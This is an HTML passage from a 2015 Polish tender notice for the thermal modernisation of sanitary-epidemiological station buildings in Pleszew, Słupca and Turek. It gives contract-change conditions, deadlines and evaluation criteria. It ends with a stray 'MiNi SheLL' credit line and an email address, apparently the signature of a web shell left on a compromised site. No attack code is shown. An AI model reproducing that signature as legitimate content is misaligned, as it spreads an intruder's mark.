<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5. Zamawiający przewiduje możliwość zmiany warunków umowy, tj:
1) Zmiana terminu realizacji przedmiotu umowy:
a) zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi w szczególności:
klęski żywiołowe
niewypały i niewybuchy
b) zmiany będące następstwem działania organów administracji,
w szczególności:
przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.
odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń
c) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, a w szczególności brak możliwości dojazdu oraz transportu materiałów na teren robót spowodowany awariami, remontami, przebudowami dróg dojazdowych oraz protestami mieszkańców z blokadą dróg.
2) Zmiana sposobu spełnienia świadczenia - zmiany technologiczne,
w szczególności:
a) niedostępność na rynku materiałów lub urządzeń wskazanych
w dokumentacji projektowej spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
b) pojawienie się  nowszej technologii wykonania zaprojektowanych robót pozwalającej na  zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
c) konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane
w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu;
d) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałów ze względu na zmiany obowiązującego prawa.
3) Zmiany osobowe:
a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami,
o których mowa w ustawie Prawo budowlane;
b) zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy;
c) zmiany osób do nadzorowania robót;
d) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego
w ofercie Wykonawcy, o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych
w porównaniu do wskazanego w SIWZ. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ  muszą być wykonane przez Wykonawcę osobiście.
4) Pozostałe zmiany:
a) zmiana obowiązującej stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę;
b) rezygnacja przez Zmawiającego z realizacji części przedmiotu umowy -
w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł
w związku z wynikającymi z umowy planowanymi świadczeniami;
c) zmiany uzasadnione okolicznościami, okolicznościami, okolicznościami których mowa w art. 357 p.1 KC z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh;
d) inne niż wymienione siła wyższa (zdarzenie zewnętrzne, niemożliwe do przewidzenia i do zapobieżenia) uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ i dokumentacją przetargową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wsse-poznan.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna w Poznaniu
Sekcja ds. zamówień publicznych
ul. Libelta 36, pok. 211
61-707 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2015 godzina 10:00, miejsce: Wojewódzka Stacja Sanitarno-Epidemiologiczna w Poznaniu
Kancelaria, I p.
ul. Nowowiejskiego 23
61-705 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku PSSE w Pleszewie: ocieplenie ścian budynku, ocieplenie stropodachu, wymiana stolarki-bramy, drzwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W przedmiotowym obiekcie wykorzystuje się całkowicie istniejącą konstrukcję budynku. Funkcja wewnętrzna nie ulega zmianie i nie powoduje zmian obciążeń przypadających na konstrukcje oraz zmian schematów statycznych występujących     w przedmiotowym budynku.
Prace prowadzone będą jedynie przy elewacji zewnętrznej i dachu budynku.
Ponieważ obiekt nie spełnia wymogów ochrony cieplnej budynków projektuje się przedsięwzięcie termomodernizacyjne polegające na:
wymianie starych drzwi metalowych zewnętrznych na nowe o współczynniku U=1.7 W/m2K;
wymianie starych drewnianych bram garażowych na nowe o współczynniku U=1.7 W/m2K;
ocieplenie stropodachu styropianem o grubości 12 cm laminowanych papą      o współczynniku przewodności =0.040 W/m2K warstwą papy termozgrzewalnej;
ocieplenie ścian zewnętrznych budynku budynku styropianem o grubości 15 cm;
ocieplenie ścian zewnętrznych przyziemia (cokołu) do wysokości 85 cm styropianem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Słupcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem opracowania jest docieplenie ścian zewnętrznych budynku PSSE          w Słupcy oraz wymiana stolarki okiennej i drzwiowej, ocieplenie stropodachu oraz wymiana pieca co.o.
Zakres prac obejmuje:
docieplenie ścian podłużnych;
docieplenie ściany podokiennej;
docieplenie marka międzyokiennego;
demontaż starego kotła gazowego oraz pompy podmieszania;
montaż nowego pieca gazowego kondensacyjnego z pompą obiegu kotła          i całkowitym osprzętem;
roboty towarzyszące.
Uwaga! Budynek znajduje się pod ochroną Konserwatora Zabytków, dlatego istotne jest odtworzenie wszystkich elementów ozdobnych w postaci gzymsów, ryzalitów      i podokienników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Turku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem opracowania jest poprawienie parametrów cieplno-wilgotnościowych ścian zewnętrznych i stropodachu budynku przez docieplenie metodą lekką-mokrą, docieplenie stropodachu materiałem termoizolacyjnym, oraz modernizację instalacji centralnego ogrzewania uwzględniając obowiązujące normy i przepisy budowlane.
	Zakres projektowanej termomodernizacji:
	Termomodernizacja ścian zewnętrznych w technologii lekkiej mokrej
styropian grubości 12 cm EPS 70  = 0,038
docieplenie ościeży styropianem grubości 2 cm EPS 70  = 0,038
	Tynki cienkowarstwowe akrylowe dekoracyjne systemowe
	Termomodernizacja stropodachu wentylowanego:
wełna mineralna GRANULAT grubości 23 cm o współczynniku  = 0,06 W/(m2K) .
	Modernizację instalacji c.o. polegającej na   wymianie grzejników, izolacji termicznej 	rur w pomieszczeniach nieogrzewanych, wymianie rur i gałązek w przypadku zmiany 	lokalizacji grzejników, odcinków rur skorodowanych i zamontowaniu zaworów 	termostatycznych.
	Roboty towarzyszące i różne związane z projektowaną termomodernizacją budynku / 	tynki dekoracyjne daszków, gzymsów,
pokrycie dachu papą termozgrzewalną gr. 5,2 mm w kolorze zielonym z posypką mineralną, wymiana rynien, rur spustowych i obróbek blacharskich, wymianę opaski budynku z kostki brukowej przy robotach termomodernizacyjnych, montaż kratek wentylacyjnych, krat okiennych piwnicznych, malowanie elementów metalowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com